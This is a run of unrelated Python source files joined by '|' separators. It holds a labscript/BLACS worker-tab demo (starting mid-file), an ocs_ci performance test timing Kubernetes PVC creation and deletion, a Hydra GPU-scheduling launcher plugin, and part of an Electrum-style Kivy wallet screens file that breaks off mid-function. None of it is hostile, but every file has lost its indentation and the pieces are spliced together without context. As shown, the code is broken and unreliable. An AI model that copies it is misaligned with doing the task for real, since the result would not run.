# requested to do whatever you ask in queue_work (in this
# case, MyWorker.foo(5,6,7,x='x') ). Then, no events will
# be processed until that work is done. Once the work is
# done, whatever has been set with do_after will be executed
# (in this case self.leave_foo(1,2,3,bar=baz) ).
results = yield(self.queue_work('My worker','foo', 5,6,7,x='x'))
#self.toplevel.set_sensitive(True)
self.logger.debug('leaving foo')
# Here's what's NOT to do: forgetting to decorate a callback with @define_state
# when it's not something that can safely be done asynchronously
# to the state machine:
def fatal(self):
# This bug could be hard to track because nothing will happen
# when you click the button -- only once you do some other,
# correcly decorated callback will it become apparant that
# something is wrong. So don't make this mistake!
self.queue_work('My worker','foo', 5,6,7,x='x')
@define_state(MODE_MANUAL,True)
def bar(self):
self.logger.debug('entered bar')
results = yield(self.queue_work('My worker','bar', 5,6,7,x=5))
self.logger.debug('leaving bar')
@define_state(MODE_MANUAL,True)
def baz(self, button=None):
print threading.current_thread().name
self.logger.debug('entered baz')
results = yield(self.queue_work('My worker','baz', 5,6,7,x='x',return_queue=self.checkbutton.isChecked()))
print results
print threading.current_thread().name
results = yield(self.queue_work('My worker','baz', 4,6,7,x='x',return_queue=self.checkbutton.isChecked()))
print results
print threading.current_thread().name
self.logger.debug('leaving baz')
# This event shows what happens if you try to send a unpickleable
# event through a queue to the subprocess:
@define_state(MODE_MANUAL,True)
def baz_unpickleable(self):
self.logger.debug('entered baz_unpickleable')
results = yield(self.queue_work('My worker','baz', 5,6,7,x=threading.Lock()))
self.logger.debug('leaving baz_unpickleable')
# You don't need to decorate with @define_state if all you're
# doing is adding a timeout -- adding a timeout can safely be done
# asynchronously. But you can still decorate if you want, and you
# should if you're doing other work in the same function call which
# can't be done asynchronously.
def add_baz_timeout(self):
self.statemachine_timeout_add(2000,self.baz)
# Similarly, no @define_state is required here -- same applies as above.
def remove_baz_timeout(self):
self.statemachine_timeout_remove(self.baz)
class MyWorker(Worker):
def init(self):
# You read correctly, this isn't __init__, it's init. It's the
# first thing that will be called in the new process. You should
# do imports here, define instance variables, that sort of thing. You
# shouldn't import the hardware modules at the top of your file,
# because then they will be imported in both the parent and
# the child processes and wont be cleanly restarted when the subprocess
# is restarted. Since we're inside a method call though, you'll
# have to use global statements for the module imports, as shown
# below. Either that or you can make them instance variables, ie:
# import module; self.module = module. Up to you, I prefer
# the former.
global serial; import serial
self.logger.info('got x! %d' % self.x)
raise Exception('bad import!')
# Here's a function that will be called when requested by the parent
# process. There's nothing special about it really. Its return
# value will be passed as a keyword argument _results to the
# function which was queued with do_after, if there was one.
def foo(self,*args,**kwargs):
self.logger.debug('working on foo!')
time.sleep(10)
return 'results!!!'
def bar(self,*args,**kwargs):
self.logger.debug('working on bar!')
time.sleep(10)
raise Exception('error!')
return 'results!!!'
def baz(self,zzz,*args,**kwargs):
self.logger.debug('working on baz: time is %s'%repr(time.time()))
time.sleep(0.5)
if kwargs['return_queue']:
return Queue()
return 'results%d!!!'%zzz
if __name__ == '__main__':
import sys
import logging.handlers
# Setup logging:
logger = logging.getLogger('BLACS')
handler = logging.handlers.RotatingFileHandler('BLACS.log', maxBytes=1024**2, backupCount=0)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(name)s: %(message)s')
handler.setFormatter(formatter)
handler.setLevel(logging.DEBUG)
logger.addHandler(handler)
if sys.stdout.isatty():
terminalhandler = logging.StreamHandler(sys.stdout)
terminalhandler.setFormatter(formatter)
terminalhandler.setLevel(logging.INFO)
logger.addHandler(terminalhandler)
else:
sys.stdout = sys.stderr = open(os.devnull)
logger.setLevel(logging.DEBUG)
#labscript_utils.excepthook.set_logger(logger)
logger.info('\n\n===============starting===============\n')
if __name__ == '__main__':
from labscript_utils.qtwidgets.dragdroptab import DragDropTabWidget
app = QApplication(sys.argv)
window = QWidget()
layout = QVBoxLayout(window)
notebook = DragDropTabWidget()
layout.addWidget(notebook)
class FakeConnection(object):
def __init__(self):
self.BLACS_connection = 'None'
class FakeConnectionTable(object):
def __init__(self):
pass
def find_by_name(self, device_name):
return FakeConnection()
connection_table = FakeConnectionTable()
tab1 = MyTab(notebook,settings = {'device_name': 'Example', 'connection_table':connection_table})
tab2 = MyTab(notebook,settings = {'device_name': 'Example2', 'connection_table':connection_table})
window.show()
#notebook.show()
def run():
app.exec_()
tab1.close_tab()
tab2.close_tab()
sys.exit(run())
# Run the demo!:
# gtk.gdk.threads_init()
# window = gtk.Window()
# notebook = gtk.Notebook()
# window.connect('destroy',lambda widget: gtk.main_quit())
# window.add(notebook)
# notebook.show()
# window.show()
# window.resize(800,600)
# with gtk.gdk.lock:
# gtk.main()
|
test_pvc_creation_deletion_performance.py | """
Test to verify PVC deletion performance
"""
import time
import logging
import datetime
import pytest
import ocs_ci.ocs.exceptions as ex
import threading
import statistics
from concurrent.futures import ThreadPoolExecutor
from uuid import uuid4
from ocs_ci.framework.testlib import performance
from ocs_ci.ocs.perftests import PASTest
from ocs_ci.helpers import helpers, performance_lib
from ocs_ci.ocs import defaults, constants
from ocs_ci.utility.performance_dashboard import push_to_pvc_time_dashboard
from ocs_ci.helpers.helpers import get_full_test_logs_path
from ocs_ci.ocs.perfresult import PerfResult
from ocs_ci.framework import config
log = logging.getLogger(__name__)
class ResultsAnalyse(PerfResult):
"""
This class generates results for all tests as one unit
and save them to an elasticsearch server
"""
def __init__(self, uuid, crd, full_log_path):
"""
Initialize the object by reading some of the data from the CRD file and
by connecting to the ES server and read all results from it.
Args:
uuid (str): the unique uid of the test
crd (dict): dictionary with test parameters - the test yaml file
that modify it in the test itself.
full_log_path (str): the path of the results files to be found
"""
super(ResultsAnalyse, self).__init__(uuid, crd)
self.new_index = "pvc_create_delete_fullres"
self.full_log_path = full_log_path
# make sure we have connection to the elastic search server
self.es_connect()
@performance
class TestPVCCreationDeletionPerformance(PASTest):
"""
Test to verify PVC creation and deletion performance
"""
def setup(self):
"""
Setting up test parameters
"""
log.info("Starting the test setup")
super(TestPVCCreationDeletionPerformance, self).setup()
self.benchmark_name = "PVC_Creation-Deletion"
self.uuid = uuid4().hex
self.crd_data = {
"spec": {
"test_user": "Homer simpson",
"clustername": "test_cluster",
"elasticsearch": {
"server": config.PERF.get("production_es_server"),
"port": config.PERF.get("production_es_port"),
"url": f"http://{config.PERF.get('production_es_server')}:{config.PERF.get('production_es_port')}",
},
}
}
if self.dev_mode:
self.crd_data["spec"]["elasticsearch"] = {
"server": config.PERF.get("dev_es_server"),
"port": config.PERF.get("dev_es_port"),
"url": f"http://{config.PERF.get('dev_es_server')}:{config.PERF.get('dev_es_port')}",
}
@pytest.fixture()
def base_setup(self, interface_iterate, storageclass_factory, pod_factory):
"""
A setup phase for the test
Args:
interface_iterate: A fixture to iterate over ceph interfaces
storageclass_factory: A fixture to create everything needed for a
storageclass
pod_factory: A fixture to create new pod
"""
self.interface = interface_iterate
self.sc_obj = storageclass_factory(self.interface)
self.pod_factory = pod_factory
def init_full_results(self, full_results):
"""
Initialize the full results object which will send to the ES server
Args:
full_results (obj): an empty FIOResultsAnalyse object
Returns:
FIOResultsAnalyse (obj): the input object fill with data
"""
for key in self.environment:
full_results.add_key(key, self.environment[key])
full_results.add_key("storageclass", self.sc)
full_results.add_key("index", full_results.new_index)
return full_results
@pytest.mark.parametrize(
argnames=["pvc_size"],
argvalues=[
pytest.param(*["25Gi"], marks=pytest.mark.polarion_id("OCS-2007")),
pytest.param(*["50Gi"], marks=pytest.mark.polarion_id("OCS-2007")),
pytest.param(*["100Gi"], marks=pytest.mark.polarion_id("OCS-2007")),
],
)
@pytest.mark.usefixtures(base_setup.__name__)
def test_pvc_creation_deletion_measurement_performance(
self, teardown_factory, pvc_size
):
"""
Measuring PVC creation and deletion times for pvc samples
Verifying that those times are within required limits
"""
# Getting the full path for the test logs
self.full_log_path = get_full_test_logs_path(cname=self)
if self.interface == constants.CEPHBLOCKPOOL:
self.sc = "RBD"
if self.interface == constants.CEPHFILESYSTEM:
self.sc = "CephFS"
self.full_log_path += f"-{self.sc}-{pvc_size}"
log.info(f"Logs file path name is : {self.full_log_path}")
self.start_time = time.strftime("%Y-%m-%dT%H:%M:%SGMT", time.gmtime())
self.get_env_info()
# Initialize the results doc file.
self.full_results = self.init_full_results(
ResultsAnalyse(self.uuid, self.crd_data, self.full_log_path)
)
self.full_results.add_key("pvc_size", pvc_size)
num_of_samples = 5
accepted_creation_time = 1
accepted_deletion_time = 2 if self.interface == constants.CEPHFILESYSTEM else 1
self.full_results.add_key("samples", num_of_samples)
accepted_creation_deviation_percent = 50
accepted_deletion_deviation_percent = 50
creation_time_measures = []
deletion_time_measures = []
msg_prefix = f"Interface: {self.interface}, PVC size: {pvc_size}."
for i in range(num_of_samples):
logging.info(f"{msg_prefix} Start creating PVC number {i + 1}.")
start_time = datetime.datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ")
pvc_obj = helpers.create_pvc(sc_name=self.sc_obj.name, size=pvc_size)
helpers.wait_for_resource_state(pvc_obj, constants.STATUS_BOUND)
pvc_obj.reload()
creation_time = performance_lib.measure_pvc_creation_time(
self.interface, pvc_obj.name, start_time
)
logging.info(
f"{msg_prefix} PVC number {i + 1} was created in {creation_time} seconds."
)
if creation_time > accepted_creation_time:
raise ex.PerformanceException(
f"{msg_prefix} PVC creation time is {creation_time} and is greater than "
f"{accepted_creation_time} seconds."
)
creation_time_measures.append(creation_time)
pv_name = pvc_obj.backed_pv
pvc_reclaim_policy = pvc_obj.reclaim_policy
pod_obj = self.write_file_on_pvc(pvc_obj)
pod_obj.delete(wait=True)
teardown_factory(pvc_obj)
logging.info(f"{msg_prefix} Start deleting PVC number {i + 1}")
if pvc_reclaim_policy == constants.RECLAIM_POLICY_DELETE:
pvc_obj.delete()
pvc_obj.ocp.wait_for_delete(pvc_obj.name)
helpers.validate_pv_delete(pvc_obj.backed_pv)
deletion_time = helpers.measure_pvc_deletion_time(
self.interface, pv_name
)
logging.info(
f"{msg_prefix} PVC number {i + 1} was deleted in {deletion_time} seconds."
)
if deletion_time > accepted_deletion_time:
raise ex.PerformanceException(
f"{msg_prefix} PVC deletion time is {deletion_time} and is greater than "
f"{accepted_deletion_time} seconds."
)
deletion_time_measures.append(deletion_time)
else:
logging.info(
f"Reclaim policy of the PVC {pvc_obj.name} is not Delete;"
f" therefore not measuring deletion time for this PVC."
)
creation_average = self.process_time_measurements(
"creation",
creation_time_measures,
accepted_creation_deviation_percent,
msg_prefix,
)
self.full_results.add_key("creation-time", creation_average)
deletion_average = self.process_time_measurements(
"deletion",
deletion_time_measures,
accepted_deletion_deviation_percent,
msg_prefix,
)
self.full_results.add_key("deletion-time", deletion_average)
self.full_results.all_results["creation"] = creation_time_measures
self.full_results.all_results["deletion"] = deletion_time_measures
self.end_time = time.strftime("%Y-%m-%dT%H:%M:%SGMT", time.gmtime())
self.full_results.add_key(
"test_time", {"start": self.start_time, "end": self.end_time}
)
self.full_results.es_write()
log.info(f"The Result can be found at : {self.full_results.results_link()}")
if not self.dev_mode:
# all the results are OK, the test passes, push the results to the codespeed
push_to_pvc_time_dashboard(
self.interface, "1-pvc-creation", creation_average
)
push_to_pvc_time_dashboard(
self.interface, "1-pvc-deletion", deletion_average
)
def process_time_measurements(
self, action_name, time_measures, accepted_deviation_percent, msg_prefix
):
"""
Analyses the given time measured. If the standard deviation of these times is bigger than the
provided accepted deviation percent, fails the test
Args:
action_name (str): Name of the action for which these measurements were collected; used for the logging
time_measures (list of floats): A list of time measurements
accepted_deviation_percent (int): Accepted deviation percent,
if the standard deviation of the provided time measurements is bigger than this value, the test fails
msg_prefix (str) : A string for comprehensive logging
Returns:
(float) The average value of the provided time measurements
"""
average = statistics.mean(time_measures)
log.info(
f"{msg_prefix} The average {action_name} time for the sampled {len(time_measures)} "
f"PVCs is {average} seconds."
)
st_deviation = statistics.stdev(time_measures)
st_deviation_percent = st_deviation / average * 100.0
if st_deviation_percent > accepted_deviation_percent:
raise ex.PerformanceException(
f"{msg_prefix} PVC ${action_name} time deviation is {st_deviation_percent}% "
f"and is greater than the allowed {accepted_deviation_percent}%."
)
self.full_results.add_key(f"{action_name}_deviation_pct", st_deviation_percent)
log.info(
f"{msg_prefix} The standard deviation percent for {action_name} of {len(time_measures)} sampled "
f"PVCs is {st_deviation_percent}%."
)
return average
def write_file_on_pvc(self, pvc_obj, filesize=10):
"""
Writes a file on given PVC
Args:
pvc_obj: PVC object to write a file on
filesize: size of file to write (in GB)
Returns:
Pod on this pvc on which the file was written
"""
pod_obj = self.pod_factory(
interface=self.interface, pvc=pvc_obj, status=constants.STATUS_RUNNING
)
# filesize to be written is always 10 GB
file_size = f"{int(filesize * 1024)}M"
log.info(f"Starting IO on the POD {pod_obj.name}")
# Going to run only write IO
pod_obj.fillup_fs(size=file_size, fio_filename=f"{pod_obj.name}_file")
# Wait for fio to finish
fio_result = pod_obj.get_fio_results()
err_count = fio_result.get("jobs")[0].get("error")
assert (
err_count == 0
), f"IO error on pod {pod_obj.name}. FIO result: {fio_result}"
log.info("IO on the PVC has finished")
return pod_obj
@pytest.mark.usefixtures(base_setup.__name__)
def test_multiple_pvc_deletion_measurement_performance(self, teardown_factory):
"""
Measuring PVC deletion time of 120 PVCs in 180 seconds
Args:
teardown_factory: A fixture used when we want a new resource that was created during the tests
to be removed in the teardown phase.
Returns:
"""
number_of_pvcs = 120
pvc_size = "1Gi"
msg_prefix = f"Interface: {self.interface}, PVC size: {pvc_size}."
log.info(f"{msg_prefix} Start creating new 120 PVCs")
pvc_objs = helpers.create_multiple_pvcs(
sc_name=self.sc_obj.name,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
number_of_pvc=number_of_pvcs,
size=pvc_size,
burst=True,
)
for pvc_obj in pvc_objs:
pvc_obj.reload()
teardown_factory(pvc_obj)
with ThreadPoolExecutor(max_workers=5) as executor:
for pvc_obj in pvc_objs:
executor.submit(
helpers.wait_for_resource_state, pvc_obj, constants.STATUS_BOUND
)
executor.submit(pvc_obj.reload)
pod_objs = []
for pvc_obj in pvc_objs:
pod_obj = self.write_file_on_pvc(pvc_obj, 0.3)
pod_objs.append(pod_obj)
# Get pvc_name, require pvc_name to fetch deletion time data from log
threads = list()
for pvc_obj in pvc_objs:
process = threading.Thread(target=pvc_obj.reload)
process.start()
threads.append(process)
for process in threads:
process.join()
pvc_name_list, pv_name_list = ([] for i in range(2))
threads = list()
for pvc_obj in pvc_objs:
process1 = threading.Thread(target=pvc_name_list.append(pvc_obj.name))
process2 = threading.Thread(target=pv_name_list.append(pvc_obj.backed_pv))
process1.start()
process2.start()
threads.append(process1)
threads.append(process2)
for process in threads:
process.join()
log.info(f"{msg_prefix} Preparing to delete 120 PVC")
# Delete PVC
for pvc_obj, pod_obj in zip(pvc_objs, pod_objs):
pod_obj.delete(wait=True)
pvc_obj.delete()
pvc_obj.ocp.wait_for_delete(pvc_obj.name)
# Get PVC deletion time
pvc_deletion_time = helpers.measure_pv_deletion_time_bulk(
interface=self.interface, pv_name_list=pv_name_list
)
log.info(
f"{msg_prefix} {number_of_pvcs} bulk deletion time is {pvc_deletion_time}"
)
# accepted deletion time is 2 secs for each PVC
accepted_pvc_deletion_time = number_of_pvcs * 2
for del_time in pvc_deletion_time.values():
if del_time > accepted_pvc_deletion_time:
raise ex.PerformanceException(
f"{msg_prefix} {number_of_pvcs} PVCs deletion time is {pvc_deletion_time.values()} and is "
f"greater than {accepted_pvc_deletion_time} seconds"
)
logging.info(f"{msg_prefix} {number_of_pvcs} PVCs deletion times are:")
for name, a_time in pvc_deletion_time.items():
logging.info(f"{name} deletion time is: {a_time} seconds")
|
parallel_launcher.py | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import logging
from dataclasses import dataclass
from pathlib import Path
from typing import List, Optional, Sequence
from omegaconf import DictConfig, open_dict
from hydra.core.config_loader import ConfigLoader
from hydra.core.config_store import ConfigStore
from hydra.core.hydra_config import HydraConfig
from hydra.core.utils import (
JobReturn,
configure_log,
filter_overrides,
run_job,
setup_globals,
)
from hydra.plugins.launcher import Launcher
from hydra.types import TaskFunction
from IPython import embed
try:
import pynvml as nvidia_smi
except:
print("Nvidia is not supported!!!")
import time
# from multiprocessing import Process
# import multiprocessing as mp
import multiprocess as mp # used since this module does not use pickle to serialize the function (problems with hydra wrappers)
# Remember!!!! You get error if you try to import a module before the main decorator which is accessing to torch devices...
# import torch.multiprocessing as mp
# mp.set_start_method('spawn', force=True)
log = logging.getLogger(__name__)
def worker(fn, cfg, idx):
logging.info(f'Worker id: {idx}')
# time.sleep(30)
return fn(cfg)
@dataclass
class BasicLauncherConf:
_target_: str = "hydra_plugins.parallel_launcher.ParallelLauncher"
ConfigStore.instance().store(
group="hydra/launcher", name="gpu_parallel", node=BasicLauncherConf, provider="hydra"
)
class ParallelLauncher(Launcher):
def __init__(self) -> None:
super().__init__()
self.config: Optional[DictConfig] = None
self.config_loader: Optional[ConfigLoader] = None
self.task_function: Optional[TaskFunction] = None
def setup(
self,
config: DictConfig,
config_loader: ConfigLoader,
task_function: TaskFunction,
) -> None:
self.config = config
self.config_loader = config_loader
self.task_function = task_function
def launch(
self, job_overrides: Sequence[Sequence[str]], initial_job_idx: int
) -> Sequence[JobReturn]:
setup_globals()
assert self.config is not None
assert self.task_function is not None
assert self.config_loader is not None
configure_log(self.config.hydra.hydra_logging, self.config.hydra.verbose)
sweep_dir = self.config.hydra.sweep.dir
Path(str(sweep_dir)).mkdir(parents=True, exist_ok=True)
log.info(f"Launching {len(job_overrides)} jobs locally")
#Setup parallel run. gpus_id is a list of (absolute) ids of GPUs
jobs_started, runs = [], []
nvidia_smi.nvmlInit()
try:
gpus_id = list(map(int, self.config.multirun.devices.split(",")))
except:
if self.config.multirun.devices == "all":
gpus_id = range(nvidia_smi.nvmlDeviceGetCount())
else:
raise RuntimeError("Use correct yaml to choose GPUs")
# TODO the following can be improved. The list of objects gpus should contain also the ids
gpus_real_stats = []
for gpu_id in gpus_id:
gpus_real_stats.append(nvidia_smi.nvmlDeviceGetHandleByIndex(gpu_id))
def get_gpus_usage(gpus_real_stats, cfg):
usage = []
if cfg.multirun.gpu_bottleneck == "usage":
for g in gpus_real_stats:
usage.append(nvidia_smi.nvmlDeviceGetUtilizationRates(g).gpu)
elif cfg.multirun.gpu_bottleneck == "memory":
for g in gpus_real_stats:
mem_res = nvidia_smi.nvmlDeviceGetMemoryInfo(g)
usage.append(100 * (mem_res.used / mem_res.total))
elif cfg.multirun.gpu_bottleneck == "tasks":
for g in gpus_real_stats:
usage.append(len(nvidia_smi.nvmlDeviceGetComputeRunningProcesses(g)))
else:
raise NotImplementedError("The scheduler does not support this bottleneck!!!")
return usage
def free_gpu(gpus_real_stats, cfg, gpus_id):
usage = get_gpus_usage(gpus_real_stats, cfg)
min_usage = usage.index(min(usage))
if usage[min_usage] >= cfg.multirun.max_usage:
return -1
else:
return gpus_id[min_usage]
# Setup loading threshold
self.config.multirun.max_usage = int(self.config.multirun.max_usage)
while job_overrides:
next_free_gpu = free_gpu(gpus_real_stats, self.config, gpus_id)
print(f"Next gpus is {next_free_gpu}")
started_programs = []
if next_free_gpu == -1:
time.sleep(self.config.multirun.wait_for_next_available_gpu)
continue
else:
idx, overrides = len(jobs_started), job_overrides[0]
log.info("\t#{} : {}".format(idx, " ".join(filter_overrides(overrides))))
sweep_config = self.config_loader.load_sweep_config(self.config, list(overrides))
with open_dict(sweep_config):
sweep_config.hydra.job.id = idx
sweep_config.hydra.job.num = idx
HydraConfig().set_config(sweep_config)
# Insert the free GPU that is going to be used
sweep_config.device = f"cuda:{next_free_gpu}"
# p = run_job(sweep_config,
# self.task_function,
# "hydra.sweep.dir",
# "hydra.sweep.subdir",)
# # self.task_function(sweep_config)
# print(self.task_function)
# print(worker)
# p = mp.Process(target=self.task_function, args=(sweep_config,))
# p.start()
p = mp.Process(target=run_job, args=(sweep_config,
self.task_function,
"hydra.sweep.dir",
"hydra.sweep.subdir",))
p.start()
# print('function name: ', self.task_function.__name__)
# p = mp.Process(target=worker, args=(self.task_function, sweep_config, idx,))
# p.start()
started_programs.append(p)
jobs_started.append(job_overrides.pop(0))
configure_log(self.config.hydra.hydra_logging, self.config.hydra.verbose)
# time.sleep(15)
time.sleep(self.config.multirun.wait_to_start_new_job)
for p in started_programs:
p.join()
return runs
# print("parallel_launcher_luca")
# embed()
#
# #####################
# runs: List[JobReturn] = []
# for idx, overrides in enumerate(job_overrides):
# idx = initial_job_idx + idx
# lst = " ".join(filter_overrides(overrides))
# log.info(f"\t#{idx} : {lst}")
# sweep_config = self.config_loader.load_sweep_config(
# self.config, list(overrides)
# )
# with open_dict(sweep_config):
# sweep_config.hydra.job.id = idx
# sweep_config.hydra.job.num = idx
# HydraConfig.instance().set_config(sweep_config)
# ret = run_job(
# config=sweep_config,
# task_function=self.task_function,
# job_dir_key="hydra.sweep.dir",
# job_subdir_key="hydra.sweep.subdir",
# )
# runs.append(ret)
# configure_log(self.config.hydra.hydra_logging, self.config.hydra.verbose)
# return runs
|
screens.py | import asyncio
from weakref import ref
from decimal import Decimal
import re
import threading
import traceback, sys
from typing import TYPE_CHECKING, List
from kivy.app import App
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.compat import string_types
from kivy.properties import (ObjectProperty, DictProperty, NumericProperty,
ListProperty, StringProperty)
from kivy.uix.recycleview import RecycleView
from kivy.uix.label import Label
from kivy.uix.behaviors import ToggleButtonBehavior
from kivy.uix.image import Image
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.utils import platform
from electrum.bitcoin import TYPE_ADDRESS
from electrum.util import profiler, parse_URI, format_time, InvalidPassword, NotEnoughFunds, Fiat
from electrum.util import PR_TYPE_ONCHAIN, PR_TYPE_LN
from electrum import bitcoin, constants
from electrum.transaction import TxOutput, Transaction, tx_from_str
from electrum.util import send_exception_to_crash_reporter, parse_URI, InvalidBitcoinURI
from electrum.util import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED, PR_INFLIGHT, TxMinedInfo, get_request_status, pr_expiration_values
from electrum.plugin import run_hook
from electrum.wallet import InternalAddressCorruption
from electrum import simple_config
from electrum.lnaddr import lndecode
from electrum.lnutil import RECEIVED, SENT, PaymentFailure
from .dialogs.question import Question
from .dialogs.lightning_open_channel import LightningOpenChannelDialog
from electrum.gui.kivy.i18n import _
if TYPE_CHECKING:
from electrum.gui.kivy.main_window import ElectrumWindow
class HistoryRecycleView(RecycleView):
pass
class RequestRecycleView(RecycleView):
pass
class PaymentRecycleView(RecycleView):
pass
class CScreen(Factory.Screen):
__events__ = ('on_activate', 'on_deactivate', 'on_enter', 'on_leave')
action_view = ObjectProperty(None)
loaded = False
kvname = None
app = App.get_running_app() # type: ElectrumWindow
def _change_action_view(self):
app = App.get_running_app()
action_bar = app.root.manager.current_screen.ids.action_bar
_action_view = self.action_view
if (not _action_view) or _action_view.parent:
return
action_bar.clear_widgets()
action_bar.add_widget(_action_view)
def on_enter(self):
# FIXME: use a proper event don't use animation time of screen
Clock.schedule_once(lambda dt: self.dispatch('on_activate'), .25)
pass
def update(self):
pass
@profiler
def load_screen(self):
self.screen = Builder.load_file('electrum/gui/kivy/uix/ui_screens/' + self.kvname + '.kv')
self.add_widget(self.screen)
self.loaded = True
self.update()
setattr(self.app, self.kvname + '_screen', self)
def on_activate(self):
if self.kvname and not self.loaded:
self.load_screen()
#Clock.schedule_once(lambda dt: self._change_action_view())
def on_leave(self):
self.dispatch('on_deactivate')
def on_deactivate(self):
pass
# note: this list needs to be kept in sync with another in qt
TX_ICONS = [
"unconfirmed",
"close",
"unconfirmed",
"close",
"clock1",
"clock2",
"clock3",
"clock4",
"clock5",
"confirmed",
]
class HistoryScreen(CScreen):
tab = ObjectProperty(None)
kvname = 'history'
cards = {}
def __init__(self, **kwargs):
self.ra_dialog = None
super(HistoryScreen, self).__init__(**kwargs)
def show_item(self, obj):
key = obj.key
tx = self.app.wallet.db.get_transaction(key)
if not tx:
return
self.app.tx_dialog(tx)
def get_card(self, tx_item): #tx_hash, tx_mined_status, value, balance):
is_lightning = tx_item.get('lightning', False)
timestamp = tx_item['timestamp']
key = tx_item.get('txid') or tx_item['payment_hash']
if is_lightning:
status = 0
txpos = tx_item['txpos']
status_str = 'unconfirmed' if timestamp is None else format_time(int(timestamp))
icon = "atlas://electrum/gui/kivy/theming/light/lightning"
message = tx_item['label']
fee_msat = tx_item['fee_msat']
fee = int(fee_msat/1000) if fee_msat else None
fee_text = '' if fee is None else 'fee: %d sat'%fee
else:
tx_hash = tx_item['txid']
conf = tx_item['confirmations']
txpos = tx_item['txpos_in_block'] or 0
height = tx_item['height']
tx_mined_info = TxMinedInfo(height=tx_item['height'],
conf=tx_item['confirmations'],
timestamp=tx_item['timestamp'])
status, status_str = self.app.wallet.get_tx_status(tx_hash, tx_mined_info)
icon = "atlas://electrum/gui/kivy/theming/light/" + TX_ICONS[status]
message = tx_item['label'] or tx_hash
fee = tx_item['fee_sat']
fee_text = '' if fee is None else 'fee: %d sat'%fee
ri = {}
ri['screen'] = self
ri['key'] = key
ri['icon'] = icon
ri['date'] = status_str
ri['message'] = message
ri['fee_text'] = fee_text
value = tx_item['value'].value
if value is not None:
ri['is_mine'] = value <= 0
ri['amount'] = self.app.format_amount(value, is_diff = True)
if 'fiat_value' in tx_item:
ri['quote_text'] = str(tx_item['fiat_value'])
return ri
def update(self, see_all=False):
wallet = self.app.wallet
if wallet is None:
return
history = sorted(wallet.get_full_history(self.app.fx).values(), key=lambda x: x.get('timestamp') or float('inf'), reverse=True)
history_card = self.screen.ids.history_container
history_card.data = [self.get_card(item) for item in history]
class SendScreen(CScreen):
kvname = 'send'
payment_request = None
payment_request_queued = None
parsed_URI = None
def set_URI(self, text):
if not self.app.wallet:
self.payment_request_queued = text
return
try:
uri = parse_URI(text, self.app.on_pr, loop=self.app.asyncio_loop)
except InvalidBitcoinURI as e:
self.app.show_info(_("Error parsing URI") + f":\n{e}")
return
self.parsed_URI = uri
amount = uri.get('amount')
self.screen.address = uri.get('address', '')
self.screen.message = uri.get('message', '')
self.screen.amount = self.app.format_amount_and_units(amount) if amount else ''
self.payment_request = None
self.screen.is_lightning = False
def set_ln_invoice(self, invoice):
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
self.app.show_info(invoice + _(" is not a valid Lightning invoice: ") + repr(e)) # repr because str(Exception()) == ''
return
self.screen.address = invoice
self.screen.message = dict(lnaddr.tags).get('d', None)
self.screen.amount = self.app.format_amount_and_units(lnaddr.amount * bitcoin.COIN) if lnaddr.amount else ''
self.payment_request = None
self.screen.is_lightning = True
def update(self):
if not self.loaded:
return
if self.app.wallet and self.payment_request_queued:
self.set_URI(self.payment_request_queued)
self.payment_request_queued = None
_list = self.app.wallet.get_invoices()
lnworker_logs = self.app.wallet.lnworker.logs if self.app.wallet.lnworker else {}
_list = [x for x in _list if x and x.get('status') != PR_PAID or x.get('rhash') in lnworker_logs]
payments_container = self.screen.ids.payments_container
payments_container.data = [self.get_card(item) for item in _list]
def show_item(self, obj):
self.app.show_invoice(obj.is_lightning, obj.key)
def get_card(self, item):
invoice_type = item['type']
status, status_str = get_request_status(item) # convert to str
if invoice_type == PR_TYPE_LN:
key = item['rhash']
log = self.app.wallet.lnworker.logs.get(key)
if item['status'] == PR_INFLIGHT and log:
status_str += '... (%d)'%len(log)
elif invoice_type == PR_TYPE_ONCHAIN:
key = item['id']
else:
raise Exception('unknown invoice type')
return {
'is_lightning': invoice_type == PR_TYPE_LN,
'is_bip70': 'bip70' in item,
'screen': self,
'status': status,
'status_str': status_str,
'key': key,
'memo': item['message'],
'amount': self.app.format_amount_and_units(item['amount'] or 0),
}
def do_clear(self):
self.screen.amount = ''
self.screen.message = ''
self.screen.address = ''
self.payment_request = None
self.screen.locked = False
self.parsed_URI = None
def set_request(self, pr):
self.screen.address = pr.get_requestor()
amount = pr.get_amount()
self.screen.amount = self.app.format_amount_and_units(amount) if amount else ''
self.screen.message = pr.get_memo()
self.screen.locked = True
self.payment_request = pr
def do_paste(self):
data = self.app._clipboard.paste().strip()
if not data:
self.app.show_info(_("Clipboard is empty"))
return
# try to decode as transaction
try:
raw_tx = tx_from_str(data)
tx = Transaction(raw_tx)
tx.deserialize()
except:
tx = None
if tx:
self.app.tx_dialog(tx)
return
lower = data.lower()
if lower.startswith('lightning:ln'):
lower = lower[10:]
# try to decode as URI/address
if lower.startswith('ln'):
self.set_ln_invoice(lower)
else:
self.set_URI(data)
def read_invoice(self):
address = str(self.screen.address)
if not address:
self.app.show_error(_('Recipient not specified.') + ' ' + _('Please scan a Tachacoin address or a payment request'))
return
if not self.screen.amount:
self.app.show_error(_('Please enter an amount'))
return
try:
amount = self.app.get_amount(self.screen.amount)
except:
self.app.show_error(_('Invalid amount') + ':\n' + self.screen.amount)
return
message = self.screen.message
if self.screen.is_lightning:
return self.app.wallet.lnworker.parse_bech32_invoice(address)
else:
if not bitcoin.is_address(address):
self.app.show_error(_('Invalid Tachacoin Address') + ':\n' + address)
return
outputs = [TxOutput(TYPE_ADDRESS, address, amount)]
return self.app.wallet.create_invoice(outputs, message, self.payment_request, self.parsed_URI)
def do_save(self):
invoice = self.read_invoice()
if not invoice:
return
self.app.wallet.save_invoice(invoice)
self.do_clear()
self.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.app.wallet.save_invoice(invoice)
self.do_clear()
self.update()
self.do_pay_invoice(invoice)
def do_pay_invoice(self, invoice):
if invoice['type'] == PR_TYPE_LN:
self._do_pay_lightning(invoice)
return
elif invoice['type'] == PR_TYPE_ONCHAIN:
do_pay = lambda rbf: self._do_pay_onchain(invoice, rbf)
if self.app.electrum_config.get('use_rbf'):
d = Question(_('Should this transaction be replaceable?'), do_pay)
